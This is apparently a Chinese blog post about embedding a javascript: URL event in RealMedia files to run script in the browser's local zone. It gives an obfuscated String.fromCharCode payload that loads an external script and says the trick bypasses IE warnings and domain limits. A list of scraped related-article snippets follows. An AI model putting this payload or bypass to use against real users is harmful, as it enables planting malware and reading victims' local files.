rm格式插入广告代码

很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.

代码如下:

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/

这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......

真希望这些边缘的地方能出点问题,我感觉还是可能的 :)

(0)

相关推荐

  • rm格式插入广告代码

    很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果. 复制代码 代码如下: u 00:00:02 00:00:05 file://C:\WINDOWS\

  • Android 应用中插入广告的实例

    想必大家都知道,国内的Android应用基本都是免费的,那么开发者如何获得收入呢?应用中插入广告是一个比较常用的盈利手段.本文就讲解如何在Android应用中插入广告. 国内的广告平台有很多,用户数量比较多的有万普,有米,多普.下面就不一一介绍了,免得说我打广告.本文以万普为例.   1.首先去万普官网下载sdk,把sdk里面的jar包导入到项目的lib目录下.        2.修改AndroidManifest.xml文件. 确保应用具有以下几项权限: XML/HTML代码 <uses-pe

  • Android 应用中插入广告详解及简单实例

    想必大家都知道,国内的Android应用基本都是免费的,那么开发者如何获得收入呢?应用中插入广告是一个比较常用的盈利手段.本文就讲解如何在Android应用中插入广告. 国内的广告平台有很多,用户数量比较多的有万普,有米,多普.下面就不一一介绍了,免得说我打广告.本文以万普为例. 1.首先去万普官网下载sdk,把sdk里面的jar包导入到项目的lib目录下.        2.修改AndroidManifest.xml文件. 确保应用具有以下几项权限: XML/HTML代码 <uses-perm

  • Java判断上传图片格式的实例代码

    先给大家介绍下java判断上传图片格式. 由于客户上传图片将png的图片的后缀名改为jpg,所以通过后缀名判断不行,用下面这个方法可以 //判断是否是JPG格式 log.info("-1----进入JPG格式判断....."); ImageInputStream iis = ImageIO.createImageInputStream(file.getInputStream()); Iterator<ImageReader> iter = ImageIO.getImageR

  • 广告代码静态化js通用函数

    /* JavaScript Document 广告代码静态化js通用函数 原则上每个页面不应该出现域名的固定指向 */ /* Config */ var sSiteUrl = "http://www.spvjoy.com"; //var sSiteUrl = "http://192.168.1.30:82"; var sSendSite = "http://send.mmstoon.com"; var sMp3Url = "http:/

  • jQuery判断邮箱格式对错实例代码讲解

    废话不多说了,具体代码如下所示: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>检测Email地址格式是否正确</title> <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"><

  • js右下角与漂浮广告代码(兼容多浏览器)

    ie6 7 8 ff3.5 3.6 chrome 4.1.2 safari 主要代码如下: 我们右下角广告代码 html,body{ padding:0; margin:0; } 我在随平滚 我静止不动 function scrollx(p){ var d = document,dd = d.documentElement,db = d.body,w = window,o = d.getElementById(p.id),ie6 = /msie 6/i.test(navigator.userAg

  • 一段时间以后切换显示的广告代码 原创

    先显示广告a,一段时间以后显示广告代码b,然后就一直显示广告b 一段时间以后切换的广告显示代码 a部分内容 b部分内容 var s=5000; //5000毫秒就是5秒 function showb(){ document.getElementById('a').style.display='none'; document.getElementById('b').style.display='block'; } window.setInterval("showb()",s) [Ctrl

  • js 左右悬浮对联广告代码示例

    一段js 左右悬浮广告代码,只要修改广告图片地址与连接地址,相应参数根据页面调整下就可以使用这段左右悬浮广告代码了 代码: var delta=0.15 var collection; function floaters() { this.items = ; this.addItem = function(id,x,y,content) { document.write('<DIV id='+id+' style="Z-INDEX: 10; POSITION: absolute; widt

  • js+flash实现的5图变换效果广告代码(附演示与demo源码下载)

    js+flash实现的5图变换效果广告代码(附演示与demo源码下载)

    本文实例讲述了js+flash实现的5图变换效果广告代码.分享给大家供大家参考,具体如下: 这是一款类似淘宝图片广告的js+flash广告代码.非常美观实用! 运行效果截图如下: 点击此处查看在线演示效果. 具体代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"

随机推荐